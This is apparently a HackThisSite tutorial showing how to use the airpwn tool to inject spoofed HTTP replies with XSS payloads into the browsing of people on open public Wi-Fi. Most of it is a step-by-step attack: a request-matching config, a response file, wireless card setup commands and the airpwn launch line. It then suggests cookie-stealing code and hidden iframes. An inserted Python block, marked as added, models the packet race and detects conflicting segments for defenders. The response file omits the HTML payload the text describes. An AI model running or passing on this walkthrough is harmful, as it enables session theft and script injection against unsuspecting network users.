"The question is not whether we will be extremists, but what kind of extremists we will be. . . The nation and the world are in dire need of creative extremists." -- Martin Luther King Jr.
If I asked how many of you have ever used a public hotspot, whether at the airport, a coffee shop, a store, or anywhere else, the vast majority of you would probably answer yes. Of course, we all know how unsafe these public wireless networks can be; so we know better than to read our email, enter our passwords, or give out any sensitive information. However, many people (even the most informed) still believe that casual surfing of the net on a public network is perfectly fine. Usually, they would respond with:
“If I’m not looking at something private, who cares if someone’s watching?”
The reality is that packet sniffing is no longer the only threat to public network users: packet injection tools like airpwn can make even casual browsing incredibly dangerous.
In this article, I will show you how airpwn can generate spoofed packets containing XSS payloads and what you could potentially do with them. Hopefully, this article will give you some insight on the huge dangers of using unencrypted public hotspots and will convince you to try and avoid them.
Disclaimer
I wrote this article purely as an educational illustration of what airpwn can do to users of an unencrypted public wireless network. Neither I, nor HackThisSite, shall be held responsible for any damages you cause based on the information in this article.
How Airpwn Works
Airpwn is a packet injection tool that monitors 802.11a/b/g networks and scans for outgoing request packets from a victim's computer. It uses a regex-based, configurable filtering engine to find 'matching' request packets. Once it locates a matching request, airpwn can inject spoofed reply packets back to the victim's computer carrying the correct IP address and MAC address of the requested resource, as well as any specified payload. Since the attacker's spoofed packets arrive faster than the packets from the requested resource (airpwn can respond in less than 1ms, while average internet latency is about 50ms), the victim's computer accepts the injected packets and treats them as valid. When the real packets from the requested resource finally arrive, they are either dropped (if the real reply is shorter than the spoofed one) or appended to the spoofed packets (if the real reply is longer than the spoofed one).
With that said, the attacker could easily inject replacement pictures, HTML, client side scripting languages like Javascript, or any other XSS payload into the forged packets. This is where XSS and wireless network attacks cross paths, and as a result, XSS is given an entirely new meaning; each and every website visited suddenly becomes XSS vulnerable.
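The following Python is an added example, not code from the article or the airpwn project. It models the race just described (first copy of each byte wins, so a longer real reply only has its tail appended) and shows the on-the-wire signature a defender can look for: two segments covering the same TCP sequence numbers with different bytes, which a legitimate retransmission never produces. The sample segments are constructed, not captured traffic.

```python
# Added example (not from the article or the airpwn project): a small model
# of the race the text describes, plus a detector for its on-the-wire
# signature. Sample segments below are constructed, not captured traffic.
from dataclasses import dataclass


@dataclass
class Segment:
    seq: int     # TCP sequence number of the first payload byte
    data: bytes  # payload bytes


def reassemble_first_wins(segments):
    """Model a receiver that keeps the first copy of every byte, in arrival
    order (segments are assumed contiguous). A later segment only contributes
    bytes beyond what was already accepted, which is why a shorter real reply
    is dropped entirely and a longer one has only its tail appended."""
    buf = {}
    for s in segments:
        for i, b in enumerate(s.data):
            buf.setdefault(s.seq + i, b)
    return bytes(buf[k] for k in sorted(buf))


def find_conflicts(segments):
    """Return sequence numbers where two segments carry different bytes for
    the same position. Genuine retransmissions repeat identical bytes, so a
    differing overlap means two senders answered the same request; IDS stream
    reassemblers raise an event on exactly this condition."""
    seen, conflicts = {}, []
    for s in segments:
        for i, b in enumerate(s.data):
            k = s.seq + i
            if k in seen and seen[k] != b:
                conflicts.append(k)
            seen.setdefault(k, b)
    return conflicts


ISN = 1000  # constructed initial sequence number for the server side
SPOOFED = Segment(ISN, b"HTTP/1.1 200 OK\r\nConnection: close\r\n"
                       b"Content-Type: text/html\r\n\r\n<b>injected</b><!--")
REAL = Segment(ISN, b"HTTP/1.1 200 OK\r\nServer: nginx\r\n"
                    b"Content-Type: text/html\r\n\r\n"
                    b"<html><body>Welcome to the real page</body></html>")

if __name__ == "__main__":
    print(reassemble_first_wins([SPOOFED, REAL]).decode())
    print("conflicting positions:", find_conflicts([SPOOFED, REAL])[:5])
```

Run on the two constructed segments, the victim sees the injected body followed only by the tail of the real page (already inside the opened HTML comment), and the detector reports conflicts starting at the first header byte that differs.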
Backtrack 2
Backtrack 2 is an excellent Slackware LiveCD that comes bundled with a variety of useful tools and software for security and penetration testing. Airpwn, the packet injection tool we will be using, is included on this LiveCD. You can get Backtrack 2 from http://www.remote-exploit.com. Once you have downloaded it, burn the Backtrack 2 image to a CD and boot from it. Depending on your computer, you may have to change your boot order. Once the LiveCD boots, you can use the username root and the password toor to login.
The Attack
1. Go to the root directory of the airpwn program. On Backtrack 2, you can do this by running the command: cd /pentest/wireless/airpwn-*
2. Go to the configuration directory by running: cd conf
3. Start up your favourite text editor (I prefer nano) and create a new file named xss_attack. In this file, type:
CODE :
begin xss_attack
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tiff|tif)
response content/xss_content
This is the configuration we will specify for airpwn’s internal filtering engine. The second line is a regular expression for the packets that will be accepted by airpwn. The third line is another regular expression for the packets that will be ignored by airpwn. The last line specifies the content file that will be injected into each spoofed packet.
4. Go back to the root directory of the airpwn program by running: cd ..
5. Go to the content folder by running: cd content
6. Start up your favourite text editor again and create another new file named xss_content. In this file, type:
CODE :
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
This file specifies the content that will be injected into each spoofed packet. It contains the headers that would have been sent back by a web server and the HTML to inject. In the above example, each page visited by the victim would result in a Javascript alert and the rest of the code (if appended from the real packet) being commented out.
7. Go back to the root directory of the airpwn program by running: cd ..
8. Run: ./madwifing_prep.sh to set up your 802.11a/b/g wireless network card.
9. Find the name of your wireless interface by running: iwconfig
10. Set the channel of your wireless card to the channel of the target wireless network. For example, if my wireless interface was ath0 and the channel of my target wireless network was 13, I would run: iwconfig ath0 channel 13
11. Enable your wireless interface by running: ifconfig ath0 up
12. Finally, start up airpwn by running: airpwn -c conf/xss_attack -i ath0 -d madwifi -vvv
The -c flag specifies the configuration file, the -i flag specifies the wireless interface, the -d flag specifies the driver (which should be madwifi if you used the madwifing_prep shell script), and the -vvv flag specifies verbosity.
Potential Attacks
Once you can successfully inject arbitrary content into your target wireless networks, your capabilities become endless. You could insert invisible/visible IFRAMEs, cookie stealing code, history scanners, or ANY other XSS code you wish.
“With airpwn, you *are* the network…You are every web server out there” – Source: Airpwn Readme
Preventing These Attacks
The only real way to prevent this type of attack is to avoid unencrypted public wireless networks! If you absolutely must use a public network, ensure that ALL HTTP traffic goes over an encrypted tunnel (e.g. VPN, encrypted proxies).
Happy Hacking!
HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.